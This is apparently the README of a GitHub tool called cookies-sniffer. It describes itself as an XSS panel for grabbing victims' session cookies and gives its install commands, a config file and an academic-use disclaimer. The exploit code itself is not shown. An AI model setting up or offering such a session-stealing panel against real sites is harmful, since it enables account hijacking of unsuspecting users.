cookies-sniffer
cookies-sniffer copied to clipboard
This app is an advanced XSS panel, this is used for session grabbing with XSS exploit and <img src="grabber_url">
Cookies-sniffer
Features!
- Simple data saving (JSON)
- Modulable
- Securized login system
- WEB & CLI logs saving
- Linux and windows usable
How it work ?

Installation
Install the app on the server
user@domain:~# git clone https://github.com/inplex-sys/cookies-sniffer.git
user@domain:~# cd ./cookies-sniffer/
user@domain:~# npm install
user@domain:~# node app.js
Edit credentials in config.json
{
"credentials":{
"auth_key":"put-your-password"
},
"logs":[]
}
Disclamer
This repository is for academic purposes, the use of this software is your responsibility.